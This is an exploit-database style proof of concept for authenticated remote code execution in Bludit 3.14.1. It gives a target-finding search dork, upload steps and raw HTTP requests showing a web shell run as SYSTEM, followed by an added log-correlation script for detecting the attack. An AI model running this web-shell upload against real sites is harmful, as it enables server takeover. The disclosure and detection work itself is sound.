# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version: 3-14-1
# Tested on: Windows 11 WampServer | Kali Linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
#  Step 1 : Archive your web shell as a zip (example: payload.zip)
#  Step 2 : Log in to an admin account and download 'UploadPlugin'
#  Step 3 : Go to the UploadPlugin section
#  Step 4 : Upload your zip
#  Step 5 : target/bl-plugins/[your_payload]
#
######## Proof of Concept ########


==============> START REQUEST <========================================

POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"

b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"

plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip

[binary ZIP archive body, mis-encoded during extraction and omitted here; the archive's central directory shows two entries, a/ and a/a.php]
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"

Upload
-----------------------------308003478615795926433430552264--


==============> END REQUEST <========================================

## WEB SHELL UPLOADED!

==============> START RESPONSE <========================================

HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.

==============> END RESPONSE <========================================

# REQUEST THE WEB SHELL

==============> START REQUEST <========================================

GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

==============> END REQUEST <========================================

==============> START RESPONSE <========================================

HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32

<pre>nt authority\system
</pre>

==============> END RESPONSE <========================================
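As an added defender-side example (not part of the original advisory and not the author's code), the following Python script correlates web-server access-log entries for the two requests shown in this PoC: a POST to /admin/plugin/uploadplugin followed by a direct request to a .php file under /bl-plugins/ from the same client. The combined log format, the constructed log lines and client addresses, the one-hour correlation window and the correlate-by-source-address heuristic are my assumptions, not anything the advisory states.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" access-log format (an assumption about the server's
# logging).  The sample lines below are constructed for this example: the first
# two mirror the requests in the PoC, the client addresses and remaining lines
# are invented.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_ENDPOINT = "/admin/plugin/uploadplugin"
# Direct request for a PHP file inside a plugin directory.  Bludit loads plugin
# code through its own bootstrap, so a browser hitting bl-plugins/<x>/<y>.php
# directly is unusual and worth a look even without a preceding upload.
PLUGIN_PHP_RE = re.compile(r"^/bl-plugins/[^/]+/[^/?]+\.php(\?.*)?$")

SAMPLE_LOG = """\
203.0.113.10 - - [08/Dec/2022:18:01:43 +0000] "POST /admin/plugin/uploadplugin HTTP/2.0" 200 5120
203.0.113.10 - - [08/Dec/2022:18:13:14 +0000] "GET /bl-plugins/a/a.php?cmd=whoami HTTP/2.0" 200 32
198.51.100.7 - - [08/Dec/2022:18:20:00 +0000] "GET /admin/dashboard HTTP/2.0" 200 9000
198.51.100.7 - - [08/Dec/2022:18:21:00 +0000] "GET /bl-plugins/simple-stats/css/style.css HTTP/2.0" 200 800
198.51.100.7 - - [08/Dec/2022:18:22:00 +0000] "GET /bl-plugins/simple-stats/plugin.php HTTP/2.0" 403 300
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_suspicious(lines, window_seconds=3600):
    """Return (tag, client_ip, path) tuples, in log order.

    tags:
      plugin_upload            POST to the UploadPlugin endpoint
      plugin_php_after_upload  direct plugin-PHP request from a client that
                               uploaded a plugin within window_seconds before
      plugin_php_direct        direct plugin-PHP request with no such upload
    Correlating by source address is only a heuristic (the PoC itself went
    through an ngrok tunnel), so treat the tags as triage hints, not proof.
    """
    uploads = defaultdict(list)  # client ip -> timestamps of plugin uploads
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        bare_path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and bare_path == UPLOAD_ENDPOINT:
            uploads[rec["ip"]].append(rec["ts"])
            findings.append(("plugin_upload", rec["ip"], rec["path"]))
        elif PLUGIN_PHP_RE.match(rec["path"]):
            recent = [t for t in uploads[rec["ip"]]
                      if 0 <= (rec["ts"] - t).total_seconds() <= window_seconds]
            tag = "plugin_php_after_upload" if recent else "plugin_php_direct"
            findings.append((tag, rec["ip"], rec["path"]))
    return findings


if __name__ == "__main__":
    for tag, ip, path in find_suspicious(SAMPLE_LOG.splitlines()):
        print(f"{tag:24} {ip:15} {path}")
```

Run it against a real access log with `find_suspicious(open(path).read().splitlines())`; on the constructed sample it reports the upload, the follow-up request to a/a.php as the high-priority pairing, and the unrelated plugin.php hit as a lower-priority direct request. A tighter window shrinks the pairing, so pick one that matches how long a plugin upload normally sits before it is used on your site.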